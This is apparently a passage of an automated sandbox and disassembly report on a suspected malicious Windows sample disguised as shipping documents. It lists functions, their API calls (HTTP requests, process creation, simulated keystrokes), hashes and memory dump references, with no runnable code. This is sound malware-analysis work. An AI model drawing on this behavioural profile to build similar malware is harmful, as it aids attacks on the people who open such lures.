                                                                                    • Instruction ID: 704a870bc162f1a3e23f78378d77a0c281f4499fb4bf00646a45721f7e5dcbb5
                                                                                    • Opcode Fuzzy Hash: e2c1f807580717a533ac62cc256e895f2048550d140a489f4fd58c5c6318e6d6
                                                                                    • Instruction Fuzzy Hash: CE91A470A08605EACF18EFA0C482BEDFBE4FF16300F548199D859A7191DF316999DBB1
                                                                                    Function 00B52E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 00B52EAE
                                                                                      • Part of subcall function 00B51DB3: GetClientRect.USER32(?,?), ref: 00B51DDC
                                                                                      • Part of subcall function 00B51DB3: GetWindowRect.USER32(?,?), ref: 00B51E1D
                                                                                      • Part of subcall function 00B51DB3: ScreenToClient.USER32(?,?), ref: 00B51E45
                                                                                    • GetDC.USER32 ref: 00B8CD32
                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00B8CD45
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00B8CD53
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00B8CD68
                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00B8CD70
                                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00B8CDFB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                    • String ID: U
                                                                                    • API String ID: 4009187628-3372436214
                                                                                    • Opcode ID: 4b8a44da3c9e822ba841305f800ae0a05e554599fc9d81db5412a1362b7f290e
                                                                                    • Instruction ID: 2b8883bc735583d9af9a3567b4e49f3482f09d609e2b949d16a0e72916b0bba5
                                                                                    • Opcode Fuzzy Hash: 4b8a44da3c9e822ba841305f800ae0a05e554599fc9d81db5412a1362b7f290e
                                                                                    • Instruction Fuzzy Hash: 6971BC71800205DFCF21AF64C881AAA7FF5FF49321F1482FAED595A2A6D7309845DFA0
                                                                                    Function 00BC1A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00BC1A50
                                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00BC1A7C
                                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00BC1ABE
                                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00BC1AD3
                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BC1AE0
                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00BC1B10
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00BC1B57
                                                                                      • Part of subcall function 00BC2483: GetLastError.KERNEL32(?,?,00BC1817,00000000,00000000,00000001), ref: 00BC2498
                                                                                      • Part of subcall function 00BC2483: SetEvent.KERNEL32(?,?,00BC1817,00000000,00000000,00000001), ref: 00BC24AD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                    • String ID:
                                                                                    • API String ID: 2603140658-3916222277
                                                                                    • Opcode ID: ca5818c1ad9e72adf5af5915f0183d6ead090905b5d78bb96c29904a4344a4f1
                                                                                    • Instruction ID: c95d11a47bac214aa49b822c75fd5071b4804a138c6d219a26558d816aebb41f
                                                                                    • Opcode Fuzzy Hash: ca5818c1ad9e72adf5af5915f0183d6ead090905b5d78bb96c29904a4344a4f1
                                                                                    • Instruction Fuzzy Hash: 7F419FB1501209BFEB119F54CC85FFA7BACEF09350F00816AFA05AA142EB709E409BA0
                                                                                    Function 00BC8C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00BDF910), ref: 00BC8D28
                                                                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00BDF910), ref: 00BC8D5C
                                                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00BC8ED6
                                                                                    • SysFreeString.OLEAUT32(?), ref: 00BC8F00
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                    • String ID:
                                                                                    • API String ID: 560350794-0
                                                                                    • Opcode ID: d1b9f1508401bb9e2732e0bcea904cafa4431250e4c12c3820decdc92a0477a7
                                                                                    • Instruction ID: 1b38135954478dfa89f7dbd7b82b263849e5f77edceac3c78668b0f6e9b6f111
                                                                                    • Opcode Fuzzy Hash: d1b9f1508401bb9e2732e0bcea904cafa4431250e4c12c3820decdc92a0477a7
                                                                                    • Instruction Fuzzy Hash: 3EF12871A00209EFDB14DF94C888EAEB7B9FF45315F10849DF916AB251DB31AE45CBA0
                                                                                    Function 00BCF694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00BCF6B5
                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00BCF848
                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00BCF86C
                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00BCF8AC
                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00BCF8CE
                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00BCFA4A
                                                                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00BCFA7C
                                                                                    • CloseHandle.KERNEL32(?), ref: 00BCFAAB
                                                                                    • CloseHandle.KERNEL32(?), ref: 00BCFB22
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                    • String ID:
                                                                                    • API String ID: 4090791747-0
                                                                                    • Opcode ID: a7600ce86ae2408366f97ba838d7dbabe5d575ac91e886f9482c81e725d3d96f
                                                                                    • Instruction ID: 5b6a4cd6958ede0fdf0b0847870ab2ea0c6cbd9f7b2918cd2d57d6026b3946ca
                                                                                    • Opcode Fuzzy Hash: a7600ce86ae2408366f97ba838d7dbabe5d575ac91e886f9482c81e725d3d96f
                                                                                    • Instruction Fuzzy Hash: C9E14D31604202DFCB14EF24C891B6ABBE1EF85354F1485EEF8999B2A1DB71DC45CB52
                                                                                    Function 00BB4CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00BB466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00BB3697,?), ref: 00BB468B
                                                                                      • Part of subcall function 00BB466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00BB3697,?), ref: 00BB46A4
                                                                                      • Part of subcall function 00BB4A31: GetFileAttributesW.KERNEL32(?,00BB370B), ref: 00BB4A32
                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00BB4D40
                                                                                    • _wcscmp.LIBCMT ref: 00BB4D5A
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00BB4D75
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                    • String ID:
                                                                                    • API String ID: 793581249-0
                                                                                    • Opcode ID: 2fc70f6118180318f4496b6c6c4a104a04378760c9fae0056cefe78a7a1f8834
                                                                                    • Instruction ID: 5eacda1c68ede34dcaa6b873b1120073071bd8e07c42d6fde1bad25a9b5b1fdf
                                                                                    • Opcode Fuzzy Hash: 2fc70f6118180318f4496b6c6c4a104a04378760c9fae0056cefe78a7a1f8834
                                                                                    • Instruction Fuzzy Hash: 325174B20083459BC725DB64D8919EFB3ECEF84351F00496EF589D3152EF74A688C766
                                                                                    Function 00BD8645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00BD86FF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: InvalidateRect
                                                                                    • String ID:
                                                                                    • API String ID: 634782764-0
                                                                                    • Opcode ID: f0f5cc7a9032358d61a7975f424bfb77c6dc823838828bd9039a5f8e4fde4a62
                                                                                    • Instruction ID: 2268fe482964e829e3e0c9f6799d721db4822c5dbeb53d16097b3e8fb9a84706
                                                                                    • Opcode Fuzzy Hash: f0f5cc7a9032358d61a7975f424bfb77c6dc823838828bd9039a5f8e4fde4a62
                                                                                    • Instruction Fuzzy Hash: DF518130501205BEEB209B28CC85FADBBE5EB06722F6041D3F915D63A1EF72E980DB41
                                                                                    Function 00B52B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00B8C2F7
                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B8C319
                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00B8C331
                                                                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00B8C34F
                                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00B8C370
                                                                                    • DestroyIcon.USER32(00000000), ref: 00B8C37F
                                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00B8C39C
                                                                                    • DestroyIcon.USER32(?), ref: 00B8C3AB
                                                                                      • Part of subcall function 00BDA4AF: DeleteObject.GDI32(00000000), ref: 00BDA4E8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                    • String ID:
                                                                                    • API String ID: 2819616528-0
                                                                                    • Opcode ID: f70285a1e6b681d8f44a2eb4fae5f44709dd68b30996c9a0c15d3ed85913af15
                                                                                    • Instruction ID: cc4ff804aa6763a11e5df7d8bfa93db8d13afac251427719a3d6e61d1ef52248
                                                                                    • Opcode Fuzzy Hash: f70285a1e6b681d8f44a2eb4fae5f44709dd68b30996c9a0c15d3ed85913af15
                                                                                    • Instruction Fuzzy Hash: 98516970A01205EFDB24DF24CC85BAA7BE5FB49311F1085A9F902972E0DB70ED95DB60
                                                                                    Function 00BA966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00BAA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00BAA84C
                                                                                      • Part of subcall function 00BAA82C: GetCurrentThreadId.KERNEL32 ref: 00BAA853
                                                                                      • Part of subcall function 00BAA82C: AttachThreadInput.USER32(00000000,?,00BA9683,?,00000001), ref: 00BAA85A
                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00BA968E
                                                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00BA96AB
                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00BA96AE
                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00BA96B7
                                                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00BA96D5
                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00BA96D8
                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00BA96E1
                                                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00BA96F8
                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00BA96FB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2014098862-0
                                                                                    • Opcode ID: 0f3dca4c9efcd398462dfdf0f92ae47303a167d4061e4de699fe726b1604e95d
                                                                                    • Instruction ID: fd71f6d52f6208bcee904fc237b9b63ec752c25990fb40a936cda6da0804f4d2
                                                                                    • Opcode Fuzzy Hash: 0f3dca4c9efcd398462dfdf0f92ae47303a167d4061e4de699fe726b1604e95d
                                                                                    • Instruction Fuzzy Hash: 5011CEB1914219BEFA106B649C89F7ABB6DEB4D750F100426F355AB0A0DEF25C10DAA4
                                                                                    Function 00BA8921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00BA853C,00000B00,?,?), ref: 00BA892A
                                                                                    • HeapAlloc.KERNEL32(00000000,?,00BA853C,00000B00,?,?), ref: 00BA8931
                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00BA853C,00000B00,?,?), ref: 00BA8946
                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00BA853C,00000B00,?,?), ref: 00BA894E
                                                                                    • DuplicateHandle.KERNEL32(00000000,?,00BA853C,00000B00,?,?), ref: 00BA8951
                                                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00BA853C,00000B00,?,?), ref: 00BA8961
                                                                                    • GetCurrentProcess.KERNEL32(00BA853C,00000000,?,00BA853C,00000B00,?,?), ref: 00BA8969
                                                                                    • DuplicateHandle.KERNEL32(00000000,?,00BA853C,00000B00,?,?), ref: 00BA896C
                                                                                    • CreateThread.KERNEL32(00000000,00000000,00BA8992,00000000,00000000,00000000), ref: 00BA8986
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                    • String ID:
                                                                                    • API String ID: 1957940570-0
                                                                                    • Opcode ID: bbc97939b5e4787b1da0ab862a3f040179c28691913f54e28760f869849a6b93
                                                                                    • Instruction ID: 9150b2fd776df510984915bac86dc0567d8fd0f3419fbd26a06be974fae8e102
                                                                                    • Opcode Fuzzy Hash: bbc97939b5e4787b1da0ab862a3f040179c28691913f54e28760f869849a6b93
                                                                                    • Instruction Fuzzy Hash: 8B01BBB5245309FFEB10ABA5DC4DF6B7BACEB89711F408421FA05DB1A1DA709800CB60
                                                                                    Function 00BC9B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                                    • API String ID: 0-572801152
                                                                                    • Opcode ID: 03446b2bc17b220f91e7eb6a0666fe3ab90950697d96c4d06748a588a020a53f
                                                                                    • Instruction ID: ac06626bac59ef6d4b5d4bff63ed29e1398026c5cd538995db3b908c8602549c
                                                                                    • Opcode Fuzzy Hash: 03446b2bc17b220f91e7eb6a0666fe3ab90950697d96c4d06748a588a020a53f
                                                                                    • Instruction Fuzzy Hash: F9C18371A0021AABEF10DF98D888FAEB7F5FB58314F1584ADE915A7280E770DD45CB90
                                                                                    Function 00BC9113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearInit$_memset
                                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                    • API String ID: 2862541840-625585964
                                                                                    • Opcode ID: 625366b552835ace5070bd8a233e1119dee8337a2a9c3fdd1686f6f476d62008
                                                                                    • Instruction ID: b02c120ad03f297e1af7d3279ccfe29ae0900379f005dea4c28cfb3b233f5ab6
                                                                                    • Opcode Fuzzy Hash: 625366b552835ace5070bd8a233e1119dee8337a2a9c3fdd1686f6f476d62008
                                                                                    • Instruction Fuzzy Hash: EA915E71A00219EBEF24DFA5C888FAEB7F8EF85710F10859DF515AB280D7709945CBA4
                                                                                    Function 00BC975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00BA710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BA7044,80070057,?,?,?,00BA7455), ref: 00BA7127
                                                                                      • Part of subcall function 00BA710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BA7044,80070057,?,?), ref: 00BA7142
                                                                                      • Part of subcall function 00BA710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BA7044,80070057,?,?), ref: 00BA7150
                                                                                      • Part of subcall function 00BA710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BA7044,80070057,?), ref: 00BA7160
                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00BC9806
                                                                                    • _memset.LIBCMT ref: 00BC9813
                                                                                    • _memset.LIBCMT ref: 00BC9956
                                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00BC9982
                                                                                    • CoTaskMemFree.OLE32(?), ref: 00BC998D
                                                                                    Strings
                                                                                    • NULL Pointer assignment, xrefs: 00BC99DB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                    • String ID: NULL Pointer assignment
                                                                                    • API String ID: 1300414916-2785691316
                                                                                    • Opcode ID: c1c7fca195d7e5a2a499da1edc1f49720730c7fda1a6bf3035116e5a3582d039
                                                                                    • Instruction ID: e220e46b6ca720f2399616ba46ca968407f4e3c98e6427bbd3bb53a240d3846d
                                                                                    • Opcode Fuzzy Hash: c1c7fca195d7e5a2a499da1edc1f49720730c7fda1a6bf3035116e5a3582d039
                                                                                    • Instruction Fuzzy Hash: 93911771D00229EBDB10DFA5DC85EDEBBB9EF09350F20419AF419A7291DB719A44CFA0
                                                                                    Function 00BD6D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00BD6E24
                                                                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 00BD6E38
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00BD6E52
                                                                                    • _wcscat.LIBCMT ref: 00BD6EAD
                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00BD6EC4
                                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00BD6EF2
                                                                                    Strings
                                                                                    Memory Dump Source
